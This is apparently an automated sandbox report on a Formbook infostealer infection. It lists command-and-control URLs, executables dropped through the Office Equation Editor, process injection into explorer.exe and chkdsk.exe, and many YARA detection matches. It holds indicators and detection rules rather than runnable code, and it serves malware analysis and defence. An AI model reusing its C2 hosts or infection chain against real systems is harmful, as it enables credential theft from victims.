          Source: explorer.exe, 00000008.00000000.413347575.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849943461.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413067200.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413347575.0000000003E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003E9C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000002.849943461.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413067200.000000000260E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerxe
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pj69vip12.cyou
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pj69vip12.cyou/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pj69vip12.cyou/ge06/www.miamirealestatecommercial.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pj69vip12.cyouReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sxchenggu.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sxchenggu.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sxchenggu.com/ge06/www.centralngs.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.sxchenggu.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.versebuild.xyz
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.versebuild.xyz/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.versebuild.xyz/ge06/www.luxpsy.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.versebuild.xyzReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.west-paws.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.west-paws.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.west-paws.com/ge06/www.pj69vip12.cyou
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.west-paws.comReferer:
          Source: explorer.exe, 00000008.00000002.851097210.0000000008BFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: explorer.exe, 00000008.00000002.851097210.0000000008BFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=luxpsy.com
          Source: chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exe
          Source: unknown | DNS traffic detected: queries for: mail.treeoflifeadventures.com
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036BB92B LoadLibraryW,URLDownloadToFileW, | 2_2_036BB92B
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 14 Nov 2023 12:28:45 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00404FC2

          E-Banking Fraud

          Source: Yara match | File source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: sheet1.xml, type: SAMPLE | Matched rule: detects AutoLoad documents using LegacyDrawing | Author: ditekSHen
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: oktuxvhtsq.exe PID: 1784, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: oktuxvhtsq.exe PID: 1516, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: chkdsk.exe PID: 2052, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\word.exe
          Source: 2D86.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 771D0000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\word.exe | Memory allocated: 771D0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Memory allocated: 771D0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Memory allocated: 770B0000 page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Memory allocated: 771D0000 page execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exe | Memory allocated: 770B0000 page execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exe | Memory allocated: 771D0000 page execute and read and write
          Source: sheet1.xml, type: SAMPLE | Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
